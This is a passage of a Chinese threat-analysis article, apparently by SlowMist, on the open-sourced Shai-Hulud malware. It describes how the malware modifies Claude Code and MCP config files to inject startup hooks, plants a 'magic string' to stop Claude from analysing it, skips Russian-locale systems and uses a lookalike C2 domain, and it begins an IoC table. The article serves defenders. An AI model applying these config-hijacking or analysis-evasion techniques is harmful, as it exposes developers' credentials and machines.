255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是本案的亮点之一。恶意软件专门针对 Claude Code 进行了优化：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">- 修改 Claude 配置文件：`~/.claude.json`、`~/.claude/mcp.json`</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">- 注入执行钩子：当 Claude 启动时自动执行恶意代码</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">- &#34;Anthropic Magic String&#34;：使用特殊字符串阻止 Claude 分析</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__comment">// 发现的目标文件</span></span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;~/.claude.json&#34;</span></span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;~/.claude/mcp.json&#34;</span></span></code><br/><code><span leaf=""><span class="code-snippet__string">&#34;.kiro/settings/mcp.json&#34;</span></span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">为什么针对 Claude Code？因为 Claude Code 常常运行在拥有高权限 GitHub Token 的开发者机器上。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">三、开发者画像</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">.1 代码质量评估</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4212962962962963" data-type="png" data-w="1080" height="253" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021274" src="https://wechat2rss.xlab.app/img-proxy/?k=bbbf8ab9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJC8Kz3fyickHu2TNcAM4zTZRWS8mhmicZgQNq0zMPKY9ic1tVhNt4wm5AxdgU1kd8J1IP34a3r8KP0XXt8jvNgCYNm2iaYJHDjAD4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">结论：这是一个专业级恶意软件，开发者具备企业级软件开发能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.2 开发者地域分析</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">代码中有一处非常有趣的逻辑：</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__comment">// src/utils/config.ts</span></span></code><br/><code><span leaf=""><span class="code-snippet__keyword">export</span> <span class="code-snippet__keyword">function</span> <span class="code-snippet__title">isSystemRussian</span>(): boolean {</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">const</span> locale = <span class="code-snippet__title">Intl</span>.<span class="code-snippet__title">DateTimeFormat</span>().<span class="code-snippet__title">resolvedOptions</span>().<span class="code-snippet__property">locale</span>;</span></code><br/><code><span leaf=""> <span class="code-snippet__keyword">if</span> (locale.<span class="code-snippet__title">startsWith</span>(<span class="code-snippet__string">&#34;ru&#34;</span>)) <span class="code-snippet__keyword">return</span> <span class="code-snippet__literal">true</span>;  <span class="code-snippet__comment">// 排除俄语系统</span></span></code><br/><code><span leaf=""> <span class="code-snippet__comment">// ...</span></span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">排除俄语系统的可能原因：</span></span><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2833333333333333" data-type="png" data-w="1080" height="171" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021280" src="https://wechat2rss.xlab.app/img-proxy/?k=1875904c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCJK3OBNyxdDoUT0aYMgdu4B5r7pVW7mEaAvNcr3mViaLMFD2vHXS8OdE0T9TU7LvGtHZj11LSMLQaf8ZI3oVzze7xADUaw3Yiadw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">SlowMist Agent 思考：特意排除俄语系统，最合理的解释是开发者本身与俄语地区有密切联系。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">3.3 C2 服务器分析</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">C2 域名：git-tanstack.com</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">模仿合法域名：tanstack.com</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">路径： /router</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是典型的域名仿冒攻击手法，目的是让恶意流量看起来像合法的 TanStack 项目。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">四、追踪分析：TeamPCP</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4.1 行动痕迹</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">我们发现以下有趣的线索：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.2833333333333333" data-type="png" data-w="1080" height="171" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021282" src="https://wechat2rss.xlab.app/img-proxy/?k=87035cde&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCIs4x8tkSb9ib7vV9fcevEEzYrFaroHbILxQtXr1sxEcUYS3PZiceBia19DT69Ho8SUa97oH88HibH6YSXO2PMTzAbFG6oyPiaBTqeY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4.2 关联账号</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">三个可疑账号被发现与 Shai-Hulud 代码相关：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.29814814814814816" data-type="png" data-w="1080" height="180" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021279" src="https://wechat2rss.xlab.app/img-proxy/?k=5449a63e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCIic9EnmR73zS6odCXYoJWwfF7CsF8BtpVIPT5Lez6ykABHdRNOQKlMwmESibDU6VQPtiatBbiaH2VXzvzYMN8kZp9frQMfYUK86Yw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">猫是 TeamPCP 的标志 —— agwagwagwa 的 &#34;meow!&#34; 仓库让安全研究员确信这不是巧合。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">4.3 &#34;Anthropic Magic String&#34;</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意软件中包含一段特殊字符串，专门用来阻止 Claude Code 分析：</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__comment">// 发现于多个配置文件中</span></span></code><br/><code><span leaf=""><span class="code-snippet__comment">// 包含这段字符串的账号资料不会被 Claude 分析</span></span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这进一步证实了攻击者对 AI 安全工具的了解。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">五、开源的影响：潘多拉魔盒已打开</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.1 从&#34;专属武器&#34;到&#34;公共服务&#34;</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">TeamPCP 的这次开源，意味着：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从前：只有 TeamPCP 能发动 Shai-Hulud 攻击</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">现在：任何人都可以部署自己的 Shai-Hulud 变种</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.2 copycat 已经开始行动</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">我们的情报显示，fork 者已经开始修改代码并扩大攻击范围：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">- agwagwagwa 已提交 PR 添加 FreeBSD 支持</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">- 更多仓库正在出现</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">- 可以通过 GitHub 搜索 &#34;A Gift From TeamPCP&#34; 追踪</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">5.3 威胁等级升级</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.22962962962962963" data-type="png" data-w="1080" height="139" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021281" src="https://wechat2rss.xlab.app/img-proxy/?k=bc31c9cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKMHc2qvBeSz9O8OhNXk5SgIkXh9bkx7OQxo2pOibIRicVb0fgUnCnSicZU7YkC11oHqo1z3TDmSrydr2HUNOSich5vich7BqNHeXQQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">六、IoC 指标汇总</span></span></p><b style="font-weight:normal;" data-pm-slice="0 0 []"><table style="border:none;border-collapse:collapse;"><tbody><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">类型</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">IOC</span></span></p></td></tr><tr style="height:27.25pt;"><td><p dir="ltr" style="text-indent: 0px;line-height: 